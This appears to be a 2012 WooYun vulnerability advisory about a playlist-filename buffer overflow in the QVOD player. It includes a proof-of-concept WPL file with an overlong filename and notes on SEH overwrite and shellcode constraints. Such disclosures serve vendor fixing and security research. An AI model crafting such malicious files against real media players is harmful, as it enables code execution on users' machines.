当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013817

漏洞标题:快播播放器播放列表文件溢出

相关厂商:快播

漏洞作者: yy520

提交时间:2012-10-26 18:23

修复时间:2012-12-10 18:24

公开时间:2012-12-10 18:24

漏洞类型:远程代码执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-26: 细节已通知厂商并且等待厂商处理中
2012-10-26: 厂商已经确认,细节仅向厂商公开
2012-10-29: 细节向第三方安全合作伙伴开放
2012-12-20: 细节向核心白帽子及相关领域专家公开
2012-12-30: 细节向普通白帽子公开
2013-01-09: 细节向实习白帽子公开
2012-12-10: 细节向公众公开

简要描述:

处理播放列表文件之后,在某处再次引用文件名没有限制长度而导致溢出

详细说明:

版本:


<?wpl version="1.0"?>
<smil>
<head>
<meta name="Generator" content="Nothing is true"/>
<title>test</title>
</head>
<body>
<seq>
<media src="AAA......AAAACRAAAAAAAAAA.wma"/>
</seq>
</body>
</smil>


CR之前一共有1900个'A',CR是MultiByteToWideChar之后pop pop ret的地址,将上述代码保存为xxx.wpl
在处理wpl文件之后,在播放列表中显示


当鼠标滑过播放列表中的文件名时,将导致溢出


通过覆盖异常,可以跳转到


然后由于复制内容超出堆栈段的最大地址空间而导致异常,跳到


要想成功利用该漏洞,shellcode必须是可打印字符,然后还经过unicode转换之后还必须能使用,最后该堆栈段,还不能执行,ret2lib把。。。。

漏洞证明:

同上

修复方案:

长度限制

版权声明:转载请注明来源 yy520@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-26 19:07

厂商回复:

已经确认,此漏洞将在最近一次发布之前修正。
非常感谢yy520

最新状态:

暂无